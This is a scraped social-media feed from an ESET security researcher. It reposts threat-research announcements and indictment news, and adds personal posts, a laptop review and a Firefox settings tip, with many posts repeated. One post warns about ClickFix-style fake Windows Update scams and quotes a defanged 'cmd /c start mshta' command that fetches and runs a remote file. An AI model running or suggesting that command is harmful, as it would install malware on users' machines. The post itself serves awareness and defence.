Aryeh Goretsky
@goretsky.bsky.social
@ESET Distinguished Researcher | alum of McAfee, Microsoft MVP, Tribal Voice, Zultys | Mod @Lenovo, @Neowin.Net, Scots Newsletter forums | Intel Insider Council | Repost ≠ endorse
Reposted by Aryeh Goretsky
In H2 2025, #ESETresearch saw a thirtyfold increase in #CloudEyE detections, amounting to more than 100,000 hits over the course of six months. CloudEyE is a #MaaS downloader and cryptor used to conceal and deploy other malware, such as #Rescoms, #Formbook, and #Agent Tesla. 1/5
January 6, 2026 at 10:03 AM
Nice.
January 3, 2026 at 8:23 AM
Nice.
It was 25 years ago this month that Tribal Voice's PowWow messaging software shut down.
It is just an internet footnote now, but Tribal Voice, which was founded by John McAfee, invented much of the technology used by today's messaging software.
It is just an internet footnote now, but Tribal Voice, which was founded by John McAfee, invented much of the technology used by today's messaging software.
January 3, 2026 at 5:52 AM
It was 25 years ago this month that Tribal Voice's PowWow messaging software shut down.
It is just an internet footnote now, but Tribal Voice, which was founded by John McAfee, invented much of the technology used by today's messaging software.
It is just an internet footnote now, but Tribal Voice, which was founded by John McAfee, invented much of the technology used by today's messaging software.
Reposted by Aryeh Goretsky
In 2025, #ESETresearch analyzed hundreds of hands-on-keyboard ransomware attacks, mostly hitting manufacturing, construction, retail, technology, and healthcare. Most of these were seen in the US (17%), Spain (5%), and France, Italy, and Canada (4% each). 1/5
December 29, 2025 at 11:46 AM
In 2025, #ESETresearch analyzed hundreds of hands-on-keyboard ransomware attacks, mostly hitting manufacturing, construction, retail, technology, and healthcare. Most of these were seen in the US (17%), Spain (5%), and France, Italy, and Canada (4% each). 1/5
Reposted by Aryeh Goretsky
#ESETresearch has revisited CVE 2025 50165, a critical remote code execution vulnerability in the WindowsCodecs.dll library when processing JPG images, one of the most widely used image format s. www.welivesecurity.com/en/eset-rese... 1/6
December 23, 2025 at 12:29 PM
#ESETresearch has revisited CVE 2025 50165, a critical remote code execution vulnerability in the WindowsCodecs.dll library when processing JPG images, one of the most widely used image format s. www.welivesecurity.com/en/eset-rese... 1/6
Exactly the sort of thing Microsoft should be focusing on—under the hood performance improvements to Windows.
Microsoft is making significant enhancements to a core Windows 11 security feature, bringing performance improvements of up to 70%. #Windows11 #BitLocker
A key component in Windows 11 is getting a huge performance boost soon
Microsoft is making significant enhancements to a core Windows 11 security feature, bringing performance improvements of up to 70%.
www.neowin.net
December 23, 2025 at 1:09 AM
Exactly the sort of thing Microsoft should be focusing on—under the hood performance improvements to Windows.
Reposted by Aryeh Goretsky
#ESETresearch has discovered a new 🇨🇳-aligned APT group, #LongNosedGoblin. This group focuses on cyberespionage and targets mainly governmental entities in Southeast Asia and Japan. www.welivesecurity.com/en/eset-rese... 1/7
LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan
ESET researchers discovered a China-aligned APT group, LongNosedGoblin, which uses Group Policy to deploy cyberespionage tools across networks of governmental institutions.
www.welivesecurity.com
December 18, 2025 at 1:08 PM
#ESETresearch has discovered a new 🇨🇳-aligned APT group, #LongNosedGoblin. This group focuses on cyberespionage and targets mainly governmental entities in Southeast Asia and Japan. www.welivesecurity.com/en/eset-rese... 1/7
Russian GRU Orchestrated Cyberattacks on US Airports, Water Systems, and Food Supply, Newly Released Indictment Shows
united24media.com/latest-news/...
via @united24media.com
united24media.com/latest-news/...
via @united24media.com
Russian GRU Orchestrated Cyberattacks on US Airports, Water Systems, and Food Supply, Newly Released Indictment Shows
The US indicts Russian hackers for cyberattacks on critical infrastructure, detailing incidents in Missouri, Texas, and California.
united24media.com
December 14, 2025 at 11:15 PM
Russian GRU Orchestrated Cyberattacks on US Airports, Water Systems, and Food Supply, Newly Released Indictment Shows
united24media.com/latest-news/...
via @united24media.com
united24media.com/latest-news/...
via @united24media.com
Reposted by Aryeh Goretsky
🔴 The US has unsealed an indictment revealing how Russian GRU hackers targeted critical infrastructure, including a Missouri regional airport, water facilities in Texas, Pennsylvania, and Indiana, and a California meat-packing plant.
December 13, 2025 at 11:15 AM
🔴 The US has unsealed an indictment revealing how Russian GRU hackers targeted critical infrastructure, including a Missouri regional airport, water facilities in Texas, Pennsylvania, and Indiana, and a California meat-packing plant.
Justice Department Announces Actions to Combat Two Russian State-Sponsored Cyber Criminal Hacking Groups www.justice.gov/opa/pr/justi...
Justice Department Announces Actions to Combat Two Russian State-Sponsored Cyber Criminal Hacking Groups
The Justice Department announced two indictments in the Central District of California charging Ukrainian national Victoria Eduardovna Dubranova, 33, also known as Vika, Tory, and SovaSonya, for her r...
www.justice.gov
December 10, 2025 at 5:31 PM
Justice Department Announces Actions to Combat Two Russian State-Sponsored Cyber Criminal Hacking Groups www.justice.gov/opa/pr/justi...
Interesting. Seems ClickFix/Fake CAPTCHA scams are migrating to fake Windows Update messages:
old.reddit.com/r/antivirus/...
old.reddit.com/r/antivirus/...
What is this "cmd /c start mshta "http[:]//195[.]133[.]9[.]111/swear[.]odd" and how can i deal with this?
Posted in r/antivirus by u/remimages • 1 point and 4 comments
old.reddit.com
December 6, 2025 at 8:18 AM
Interesting. Seems ClickFix/Fake CAPTCHA scams are migrating to fake Windows Update messages:
old.reddit.com/r/antivirus/...
old.reddit.com/r/antivirus/...
Reposted by Aryeh Goretsky
#ESETresearch analyzed the #Gamaredon VBScript payload recently flagged by @ClearskySec. It wipes registry Run keys, scheduled tasks, and kills processes – however, our assessment is that this is likely to clean researchers’ machines, not a shift to destructive ops. x.com/ClearskySec/... 1/4
x.com
December 5, 2025 at 8:49 AM
#ESETresearch analyzed the #Gamaredon VBScript payload recently flagged by @ClearskySec. It wipes registry Run keys, scheduled tasks, and kills processes – however, our assessment is that this is likely to clean researchers’ machines, not a shift to destructive ops. x.com/ClearskySec/... 1/4
Reposted by Aryeh Goretsky
#ESETresearch discovered a new #MuddyWater campaign targeting critical infrastructure in 🇮🇱 Israel and 🇪🇬 Egypt, using a new backdoor – MuddyViper – and a variety of post-compromise tools www.welivesecurity.com/en/eset-rese... 1/7
MuddyWater: Snakes by the riverbank
MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook.
www.welivesecurity.com
December 2, 2025 at 11:42 AM
#ESETresearch discovered a new #MuddyWater campaign targeting critical infrastructure in 🇮🇱 Israel and 🇪🇬 Egypt, using a new backdoor – MuddyViper – and a variety of post-compromise tools www.welivesecurity.com/en/eset-rese... 1/7
Reposted by Aryeh Goretsky
#ESETresearch is heading to #AVAR2025? Dec 4, Thursday in Kuala Lumpur, 11:00–11:30 MYT.
ESET researchers Anton Cherepanov & Peter Strýček present: "Sniffing Around: Unmasking the LongNosedGoblin operation in Southeast Asia and Japan”. 1/3
ESET researchers Anton Cherepanov & Peter Strýček present: "Sniffing Around: Unmasking the LongNosedGoblin operation in Southeast Asia and Japan”. 1/3
December 1, 2025 at 1:39 PM
#ESETresearch is heading to #AVAR2025? Dec 4, Thursday in Kuala Lumpur, 11:00–11:30 MYT.
ESET researchers Anton Cherepanov & Peter Strýček present: "Sniffing Around: Unmasking the LongNosedGoblin operation in Southeast Asia and Japan”. 1/3
ESET researchers Anton Cherepanov & Peter Strýček present: "Sniffing Around: Unmasking the LongNosedGoblin operation in Southeast Asia and Japan”. 1/3
Reposted by Aryeh Goretsky
NEW: Israeli and Arab media have reported that Iran is prepared to expand an Israel-Hezbollah conflict regionally if Israel launches operations against Hezbollah. 🧵(1/4)
Full update: isw.pub/IranUpdate12...
Full update: isw.pub/IranUpdate12...
December 2, 2025 at 1:28 AM
NEW: Israeli and Arab media have reported that Iran is prepared to expand an Israel-Hezbollah conflict regionally if Israel launches operations against Hezbollah. 🧵(1/4)
Full update: isw.pub/IranUpdate12...
Full update: isw.pub/IranUpdate12...
I don't normally have a lot to say about my Congressperson Jeff Crank, but kudos to him & his staff for this mailing; the holidays are prime time for scammers to prey on people & this is a good reminder.
Only thing I'd add is a link to @cisa.bsky.social, since so much crime takes place online now.
Only thing I'd add is a link to @cisa.bsky.social, since so much crime takes place online now.
November 30, 2025 at 9:22 AM
I don't normally have a lot to say about my Congressperson Jeff Crank, but kudos to him & his staff for this mailing; the holidays are prime time for scammers to prey on people & this is a good reminder.
Only thing I'd add is a link to @cisa.bsky.social, since so much crime takes place online now.
Only thing I'd add is a link to @cisa.bsky.social, since so much crime takes place online now.
My trip report for #BSides Colorado Springs 2025 computer security conference is now live at goretsky.wordpress.com/2025/11/26/t....
If you don't know what a trip report is, or are interested in what happened at this year's #BSides, perhaps you'll find this of interest.
If you don't know what a trip report is, or are interested in what happened at this year's #BSides, perhaps you'll find this of interest.
Trip Report: BSidesCOS 2025
If you go on a business trip, it is bring value to your employer in some way. As an antivirus researcher, my business trips are typically to conferences, and what I am expected to bring back is kno…
goretsky.wordpress.com
November 26, 2025 at 10:16 PM
My trip report for #BSides Colorado Springs 2025 computer security conference is now live at goretsky.wordpress.com/2025/11/26/t....
If you don't know what a trip report is, or are interested in what happened at this year's #BSides, perhaps you'll find this of interest.
If you don't know what a trip report is, or are interested in what happened at this year's #BSides, perhaps you'll find this of interest.
Reposted by Aryeh Goretsky
#ESETresearch discovered unique toolset, QuietEnvelope, targeting the MailGates email protection system of Taiwanesw co OpenFind. The toolset was uploaded in an archive, named spam_log.7z, to VirusTotal from Taiwan. It contains Perl scripts, 3 stealthy backdoors, argument runner, and misc files. 1/8
November 24, 2025 at 5:57 PM
#ESETresearch discovered unique toolset, QuietEnvelope, targeting the MailGates email protection system of Taiwanesw co OpenFind. The toolset was uploaded in an archive, named spam_log.7z, to VirusTotal from Taiwan. It contains Perl scripts, 3 stealthy backdoors, argument runner, and misc files. 1/8
My in-depth (~15 page) review of the #Lenovo #ThinkPad X9 15 Gen 1 Aura Edition after 6+ months of use is now up on @neowin.net!
#ThinkPadThursday #LenovoIN
#ThinkPadThursday #LenovoIN
A deep dive into Lenovo's ThinkPad X9 15 Gen 1 Aura Edition reveals major changes. Is its new design enough to attract new users as well as satisfy long term ones of the brand? Read on to find out! #AI #Laptop #Review #ThinkPad
Six months with the ThinkPad X9 15 Gen 1 Aura Edition
A deep dive into Lenovo's ThinkPad X9 15 Gen 1 Aura Edition reveals major changes. Is its new design enough to attract new users as well as satisfy long term ones of the brand? Read on to find out!
www.neowin.net
November 21, 2025 at 10:12 PM
My in-depth (~15 page) review of the #Lenovo #ThinkPad X9 15 Gen 1 Aura Edition after 6+ months of use is now up on @neowin.net!
#ThinkPadThursday #LenovoIN
#ThinkPadThursday #LenovoIN
Reposted by Aryeh Goretsky
#ESETresearch discovered and analyzed a previously undocumented malicious tool for network devices that we have named #EdgeStepper, enabling China-aligned #PlushDaemon APT to perform adversary-in-the-middle to hijack updates to deliver malware. www.welivesecurity.com/en/eset-rese... 1/5
PlushDaemon compromises network devices for adversary-in-the-middle attacks
ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks.
www.welivesecurity.com
November 19, 2025 at 10:12 AM
#ESETresearch discovered and analyzed a previously undocumented malicious tool for network devices that we have named #EdgeStepper, enabling China-aligned #PlushDaemon APT to perform adversary-in-the-middle to hijack updates to deliver malware. www.welivesecurity.com/en/eset-rese... 1/5
Looks like @mozilla.org has added a new feature to #Firefox, the ability to search for images via #Google Lens when right-clicking on them.
Anyways, to disable it, go to "about:config" in the address bar and set browser.search.visualSearch.featureGate to "false"
Anyways, to disable it, go to "about:config" in the address bar and set browser.search.visualSearch.featureGate to "false"
November 17, 2025 at 4:47 AM
Looks like @mozilla.org has added a new feature to #Firefox, the ability to search for images via #Google Lens when right-clicking on them.
Anyways, to disable it, go to "about:config" in the address bar and set browser.search.visualSearch.featureGate to "false"
Anyways, to disable it, go to "about:config" in the address bar and set browser.search.visualSearch.featureGate to "false"
Reposted by Aryeh Goretsky
#ESETresearch identified an active campaign distributing #NGate – Android NFC relay malware used for contactless payment fraud – targeting Brazilian users.
It is available for download via fake Google Play sites mimicking 4 major banks and 1 e-commerce app. 1/4
It is available for download via fake Google Play sites mimicking 4 major banks and 1 e-commerce app. 1/4
November 6, 2025 at 2:00 PM
#ESETresearch identified an active campaign distributing #NGate – Android NFC relay malware used for contactless payment fraud – targeting Brazilian users.
It is available for download via fake Google Play sites mimicking 4 major banks and 1 e-commerce app. 1/4
It is available for download via fake Google Play sites mimicking 4 major banks and 1 e-commerce app. 1/4
David Harley was a brilliant writer, illustrator, and musician. More importantly, he was a good friend, and he will be missed. The world was a much brighter place for having him in it, and his passing diminishes us all.
We are deeply saddened by the passing of David Harley, a brilliant cybersecurity expert, former ESET Senior Research Fellow, author and long-time Virus Bulletin contributor.
David's legacy spans decades of research, writing, and public speaking.
Rest in peace, David. You will be missed. 💙
David's legacy spans decades of research, writing, and public speaking.
Rest in peace, David. You will be missed. 💙
November 14, 2025 at 3:02 AM
David Harley was a brilliant writer, illustrator, and musician. More importantly, he was a good friend, and he will be missed. The world was a much brighter place for having him in it, and his passing diminishes us all.
List of #United UA cancelled flights Nov 7-9: old.reddit.com/r/unitedairl...
UA Canceled Flight List for November 07, 2025; November 08, 2025; November 09, 2025
Posted in r/unitedairlines by u/zman9119 • 848 points and 126 comments
old.reddit.com
November 7, 2025 at 5:36 PM
List of #United UA cancelled flights Nov 7-9: old.reddit.com/r/unitedairl...
I was a guest on @secureiqlab.bsky.social's Reining in the Cloud #podcast. Listen in as I talk about the end of support for Windows 10 and what that means: www.spreaker.com/episode/wind...
www.spreaker.com
October 28, 2025 at 3:13 AM
I was a guest on @secureiqlab.bsky.social's Reining in the Cloud #podcast. Listen in as I talk about the end of support for Windows 10 and what that means: www.spreaker.com/episode/wind...